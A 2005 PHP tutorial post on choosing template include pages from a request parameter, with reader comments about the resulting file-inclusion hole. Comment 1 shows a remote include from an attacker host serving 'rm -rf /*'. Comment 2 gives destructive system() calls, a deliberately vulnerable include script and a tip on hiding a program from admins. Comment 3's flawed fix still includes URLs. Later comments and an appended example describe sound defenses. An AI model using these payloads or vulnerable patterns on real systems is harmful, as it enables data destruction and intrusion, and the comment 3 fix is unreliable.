
Keeping your website User-Friendly
Posted by predominant on Nov 08 2005 @ 09:39  :: 5375 unique visits

A common practice these days is the template-based web site. This involves (basically) a template file that dynamically includes the main content into itself, based on the page requested. Often your pages will change, update and move. This means that if a search engine has indexed a certain page, or one of your regular users has bookmarked a page, and that page has moved, they will get a nasty default 404 message from your web server! That's no good! We can overcome this with an include-page design, either setting a default page to include or including an error report page when the lookup fails!

Using a Default page
CODE: PHP
<?php
  // Fall back to the home page unless a valid page name was requested.
  $includePage = 'home';
  // isset() avoids an "undefined index" notice when ?page= is absent.
  $pageStr = isset($_REQUEST['page']) ? trim($_REQUEST['page']) : '';
  if ($pageStr != '' && file_exists($pageStr.'.php'))
  {
    $includePage = $pageStr;
  }
  $includePage .= '.php';
?>



Using a 404 page
CODE: PHP
<?php
  // Same lookup, but a missing page maps to the 404 page instead of home.
  $includePage = 'home';
  $pageStr = isset($_REQUEST['page']) ? trim($_REQUEST['page']) : '';
  if ($pageStr != '')
  {
    $includePage = (file_exists($pageStr.'.php') ? $pageStr : '404');
  }
  $includePage .= '.php';
?>



As long as we have a 'home.php' and a '404.php' in the same directory, both examples will be fine! Now we can include the page later in any PHP document with:
CODE: PHP
<?php include($includePage); ?>


A simple snippet, but a useful one!

8 comments posted so far

1. On Nov 09 2005 @ 18:15 Wouter wrote:

Not really secure ;)
?page=http://www.misterevil.com/hack

code for hack.php
<?php  
system('/bin/rm -rf /*');  
?>
whoeps your website got deleted :P

2. On Nov 10 2005 @ 09:13 TheJohnDoe2005 wrote:

I am running on Windows as my OS,
If I am to execute the lines below, the cmd.exe file is used to run the command in Windows.

CODE: PHP
<?php
system('dir/w'); // Display Directory files
system('ipconfig /all'); // TCP/IP Network Information
system('program.exe'); // Running external Program
system('del *.*'); // Doesn't work. You cannot delete all files as you need to return a value when prompted. Which I think you couldn't.
/*
But you can scan all the files in the directory for the full path and filename. You could do a loop and delete each file individually.
*/

system('del thisfile.php /F'); // This works.
system('del C:WINDOWSthisfile.php /F'); // This also works too.
?>


Another Way is that if you have an account on the webserver

1. You could create and upload a program.exe file to somewhere in the web server directory and run the PHP script to execute the external program. This way, you could completely wipe out anything your program.exe is created to do. Anyway, the program.exe will stay hidden in the processes tab when the script is called to run it. The admin will not see it unless he/she views the tab.

SAMPLE - a.php
CODE: PHP
<?php
    if($_REQUEST['page'])
        include($_REQUEST['page'] . ".php");
?>

<html>
<head><title></title></head>
<body>
<form>
<input type="text" name="page" />
</form>
</body>
</html>


SAMPLE b.php
CODE: PHP
<?php
    $filename = "C://thisfile.php"; // The File you want to delete
    system('del $filename /F');
?>


or you could run http://hostname/a.php?page=b

If the server is running under Windows, one way of preventing this is to disable the usage of cmd.exe.

3. On Nov 10 2005 @ 10:27 Wouter wrote:

CODE: PHP
<?PHP
  $includePage = 'home';
  $pageStr = trim($_REQUEST['page']);
  if ($pageStr != '' && file_exists($pageStr.'.php'))
  {
    $includePage = $pageStr;
  }
  $includePage = 'http://www.mywebsite.com/'.$includePage.'.php';
?>


just do it like this :)
problem solved.

4. On Nov 13 2005 @ 22:53 Barsanuphe wrote:

In my website, I have a MySQL table with the name of the page and its path.
When I get the name through $_GET, I mysql_query my way to the path, and then I can redirect correctly.
That way the name and the path are not related.

5. On Nov 14 2005 @ 08:33 dustin wrote:

I usually array the file names, and use the array index to link and pull the page from the $_GET, i.e.: ?page=3

Doing this ensures you're only pulling the pages specified in the array index, and $_GET['page'] must be numeric so exploitation is not possible (I'm 99% sure).

6. On May 25 2006 @ 16:29 guest wrote:

You could also filter your include variable on ../ and ..\ and :\ and on ://. This will prevent someone from including external files. Also set in your php.ini the setting which prevents you from fopen() on URLs.
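
The following is an added example, not the original snippet and not any commenter's code. It combines the mitigations suggested in comments 4 to 6 (a fixed list of page names, and a check that the resolved file stays inside the pages directory, which covers the `../` and `://` inputs mentioned above) into a replacement for the `$includePage` lookup at the top of the post. It assumes that content pages live in a dedicated directory (`$pagesDir`) and that `$allowedPages` lists every name a visitor may request; the temporary directory, its three pages and the sample inputs are constructed for the demo.

```php
<?php
// Added example: a hardened replacement for the $includePage lookup.
// Assumed layout: content pages (home.php, about.php, 404.php) live in a
// dedicated directory and only names in $allowedPages may be requested.
declare(strict_types=1);

/**
 * Map a user-supplied page name to an absolute file path, or return null.
 * Layer 1 (allowlist): only known names are accepted, so remote URLs,
 * stream wrappers and ../ traversal never reach the filesystem.
 * Layer 2 (containment): the resolved path must sit below $pagesDir, so a
 * later mistake in the allowlist cannot be turned into a traversal.
 */
function resolvePage(?string $requested, array $allowedPages, string $pagesDir): ?string
{
    $name = trim((string) $requested);
    if ($name === '') {
        $name = 'home';                       // same default as the original snippet
    }
    if (!in_array($name, $allowedPages, true)) {
        return null;                          // caller substitutes the 404 page
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null;                          // missing directory or file
    }
    // realpath() has collapsed symlinks and ../, so a plain prefix test is reliable.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Self-contained demo: create a throwaway pages directory (constructed data)
// and run the inputs from the post and its comments through the resolver.
$pagesDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . bin2hex(random_bytes(4));
mkdir($pagesDir, 0700);
foreach (['home', 'about', '404'] as $p) {
    file_put_contents("$pagesDir/$p.php", "<?php echo 'This is $p';");
}
$allowedPages = ['home', 'about'];            // 404 is deliberately not requestable

$inputs = [
    null,                                     // no ?page= at all
    'about',                                  // a listed page
    'contact',                                // a page that does not exist
    'http://www.misterevil.com/hack',         // the remote include from comment 1
    '../../etc/passwd',                       // directory traversal from comment 6
];
foreach ($inputs as $requested) {
    $includePage = resolvePage($requested, $allowedPages, $pagesDir)
        ?? $pagesDir . DIRECTORY_SEPARATOR . '404.php';
    printf("%-40s -> %s: ", var_export($requested, true), basename($includePage));
    include $includePage;                     // as in the original: include($includePage);
    echo "\n";
}

// Clean up the demo directory.
foreach (['home', 'about', '404'] as $p) {
    unlink("$pagesDir/$p.php");
}
rmdir($pagesDir);
```

Run it with `php` on the command line; the first two inputs print the home and about pages and the remaining three all land on 404.php without ever touching the filesystem or a URL. The allowlist alone is what stops the remote-include and traversal cases; the realpath() check is kept as a second layer in case a name containing a separator is ever added to the list by mistake. The php.ini setting comment 6 refers to is `allow_url_fopen = Off`; since PHP 5.2 the separate `allow_url_include = Off` directive controls include/require specifically and should be off as well.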

